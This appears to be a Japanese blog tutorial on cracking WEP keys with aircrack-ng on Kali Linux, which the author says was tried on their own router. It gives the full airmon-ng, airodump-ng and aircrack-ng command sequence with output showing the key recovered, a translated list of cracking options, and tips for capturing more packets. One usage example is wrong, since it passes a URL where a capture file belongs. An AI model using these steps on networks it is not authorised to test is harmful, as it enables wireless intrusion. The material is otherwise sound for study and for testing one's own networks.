ハッカーはaircrack-ngで無線LANの解析を確認する(Kali Linux)
無線LANの解析を理解するためにまとめてみました。
この動作確認は自分のwifiルータで確認を行っています。
【追加】 Youtubeに最新動画を掲載しました。
「ハッカーはaircrack-ngで無線LANのパスワード解析を確認する(Kali Linux)」
「ハッカーはaircrack-ngで無線LANのパスワード解析を確認する(Kali Linux)」
aircrack-ngとは
Aircrack-ngは、802.11WEPおよびWPA-PSKキーのクラッキングプログラムで、十分なデータパケットがキャプチャされるとキーを回復することができます。標準的なFMS攻撃にKoreK攻撃のような最適化を加えたものや、全く新しいPTW攻撃を実装しており、他のWEPクラッキングツールと比較して攻撃が非常に高速になります。
機能
- モニタリング パケットキャプチャーとテキストファイルへのデータ出力(サードパーティ製ツールでの処理用
- 攻撃の方法 パケットインジェクションによるリプレイアタック、認証解除、偽装アクセスポイントなどの攻撃
- テスト WiFiカードやドライバーの性能確認(キャプチャとインジェクション)
- クラッキング WEPおよびWPA PSK(WPA 1および2)の解読
ツールの場所
[Applications]→[06-Wireless Attacks]→[aircrack-ng]
ツールと使用方法
aircrack-ng [options] <.cap / .ivs file(s)>
例 aircrack-ng https://www.yahoo.co.jp
【実行イメージ】少し端折って整形しています。
(個人情報はマスクしています。)
aircrack-ng sample-01.cap
◎wifiで通信しているWEP APを解析します。
// wifiアダプターをモニターモードに変更
┌──(root--localhost)-[/home/kali]
└─# airmon-ng start wlan0
// 周辺のAPのパケットを収集
┌──(root--localhost)-[/home/kali]
└─# airodump-ng wlan0mon
CH 6 ][ Elapsed: 6 s ][ 2021-10-08 15:05
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
FF:FF:FF:FF:FF:FF -62 4 0 0 7 270 WPA2 CCMP PSK xxxxx-xxxxxx-g
FF:FF:FF:FF:FF:FE -62 5 0 0 7 54e WEP WEP xxxxx-xxxxxx-gw
// 調査するターゲートの情報だけ表示する。
┌──(root--localhost)-[/home/kali]
└─# airodump-ng --bssid FF:FF:FF:FF:FF:FE --channel 7 -w sample wlan0mon
15:10:58 Created capture file "asmple-01.cap".
CH 7 ][ Elapsed: 36 mins ][ 2021-10-08 15:47
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
FF:FF:FF:FF:FF:FE -63 50 20872 185246 7 7 54e WEP WEP OPN xxxxx-xxxxxx-gw
// パスワードをクラックする。
┌──(kali--localhost)-[~]
└─$ aircrack-ng sample-01.cap
Reading packets, please wait...
Opening sample-01.cap
Read 50561 packets.
Got 18779 out of 15000 IVsStarting PTW attack with 18779 ivs.
# BSSID ESSID Encryption
1 FF:FF:FF:FF:FF:FE xxxxx-xxxxxx-gw WEP (18779 IVs)
Choosing first network as target.
Reading packets, please wait...
Opening sample-01.cap
Read 50561 packets.
1 potential targets
Attack will be restarted every 5000 captured ivs.
:
:
Aircrack-ng 1.6
[00:08:24] Tested 820 keys (got 54591 IVs)
Got 50002 out of 50000 IVsStarting PTW attack with 50002 ivs.
KB depth byte(vote)
0 0/ 13 39(70144) 6D(65792) 0D(64256) 6C(64000) 22(63488) 70(63488)
1 0/ 1 F5(76288) 3D(63488) 92(62976) 4A(62720) 7F(61952) 98(61696)
2 17/ 2 F8(60416) C3(60160) D0(60160) F2(60160) FD(60160) 94(59904)
3 0/ 1 9A(77056) AB(62976) 1E(62720) C0(61696) 43(61440) C7(61184)
4 2/ 4 FE(62976) 08(62720) 26(62720) 80(61952) E9(61440) A9(60928)
KEY FOUND! [ 31:66:66:35:66:34:31:37:61:35:62:39:38 ] (ASCII: zzzzzzzz4e3b8 )
Decrypted correctly: 100%
オプション(Common options)
-a <amode>
force attack mode. (1/WEP, 2/WPA-PSK)
フォースアタックモード。(1/wep, 2/wpa-psk)
-e <essid>
target selection: network identifier.
ターゲット選択:ネットワーク識別子
-b <bssid>
target selection: access point’s MAC.
ターゲット選択:アクセスポイントのMAC
-p <nbcpu>
# of CPU to use. (default: all CPUs)
使用するCPUの#を指定します。 (デフォルト:全CPU)
-q
enable quiet mode. (no status output)
クワイエットモードを有効にします。(ステータス出力なし)
-C <macs>
merge the given APs to a virtual one.
与えられたAPを仮想のAPに統合します。
-l <file>
write key to file. Overwrites file.
キーをファイルに書き込みます。ファイルを上書きします。
オプション(Static WEP cracking options)
-c
search alpha-numeric characters only.
英数字のみを検索します。
-t
search binary coded decimal chr only.
2進化10進chrのみを検索します。
-h
search the numeric key for Fritz!BOX.
テンキーでFritz!BOXを検索します。
-d <mask>
use masking of the key. (A1:XX:CF:YY)
キーのマスキングを使用します。(A1:XX:CF:YY)
-m <maddr>
MAC address to filter usable packets.
使用可能なパケットをフィルタリングするためのMACアドレスです。
-n <nbits>
WEP key length : 64/128/152/256/512.
WEPキー長 : 64/128/152/256/512.
-i <index>
WEP key index (1 to 4), default: any.
WEPキーインデックス(1~4)、デフォルト:any
-f <fudge>
bruteforce fudge factor, default: 2.
ブルートフォースファッジファクター、デフォルト:2。
-k <korek>
disable one attack method. (1 to 17)
1つの攻撃方法を無効にします。(1~17)
-x or -x0
disable bruteforce for last keybytes.
最後のキーバイトのブルートフォースを無効にします。
-x1
last keybyte bruteforcing. (default)
最後のキーバイトのブルートフォースを行います。 (デフォルト)
-x2
enable last 2 keybytes bruteforcing.
最後の2つのキーバイトのブルートフォースを有効にする。
-X
disable bruteforce multithreading.
ブルートフォース・マルチスレッドを無効にします。
-y
experimental single bruteforce mode.
実験的な単一のブルートフォース・モード。
-K
use only old KoreK attacks. (pre-PTW)
古いKoreKの攻撃だけを使う。(プレPTW)
-s
show the key in ASCII while cracking.
クラッキング中のキーをアスキーで表示します。
-M <num>
specify maximum number of IVs to use.
使用するIVの最大数を指定します。
-D
WEP decloak, skips broken keystreams.
WEPデクローク、壊れたキーストリームをスキップします。
-P <num>
PTW debug: 1: disable Klein, 2: PTW.
PTWのデバッグ。 1:クラインを無効にする、2:PTW。
-1
run only 1 try to crack key with PTW.
PTWでのクラックは1回しかできません。
-V
run in visual inspection mode.
目視検査モードで実行します。
オプション(WEP and WPA-PSK cracking options)
-w <words>
path to wordlist(s) filename(s).
ワードリスト(複数)へのパス ファイル名(複数)。
-N <file>
path to new session filename.
新しいセッションファイルへのパス。
-R <file>
path to existing session filename.
既存のセッションファイルへのパス。
オプション(WPA-PSK options)
-E <file>
create EWSA Project file v3.
EWSAプロジェクトファイルの作成 v3.
-j <file>
create Hashcat v3.6+ file. (HCCAPX)
Hashcat v3.6+のファイルを作成します。(HCCAPX)
-J <file>
create Hashcat file. (HCCAP)
Hashcatファイルを作成します。(HCCAP)
-S
WPA cracking speed test.
WPAクラッキングのスピードテスト。
-Z <sec>
WPA cracking speed test length of execution.
WPAクラッキングのスピードテスト実行の長さ。
-r <DB>
path to airolib-ng database. (Cannot be used with -w)
airolib-ngデータベースへのパス。(-wとは併用できません)
SIMD selection:
–simd-list
Show a list of the available SIMD architectures, for this machine.
このマシンで利用可能なSIMDアーキテクチャのリストを表示します。
–simd=<option>
Use specific SIMD architecture.
特定のSIMDアーキテクチャを使用する。
<option> may be one of the following, depending on your platform:
<option>には、プラットフォームに応じて以下のいずれかを指定します。
generic
avx512
avx2
avx
sse2
altivec
power8
asimd
neon
オプション(Other options)
-u
Displays # of CPUs & MMX/SSE support.
CPUの数とMMX/SSEのサポートを表示します。
–help
Displays this usage screen.
この使用画面を表示します。
YouTubeに最新動画を掲載しました。
aircrack-ngツールのまとめ
kali linuxで使われている全てのプログラムは「aircrack-ng」を使われているようで、このコマンドさえ知っていれば「鬼に金棒」なのでしょうか。
クラックはその時の状態により、出来たり出来なかったりするみたいです。
今回も、何回もクラックを試みましたけど一筋縄ではいかなかったです。
ヒントを一つ。「調査するターゲートの情報だけ表示する。」の時に大量に「#Data」を集めるとクラックできそうですね。
いつもそうですが、試行錯誤してます。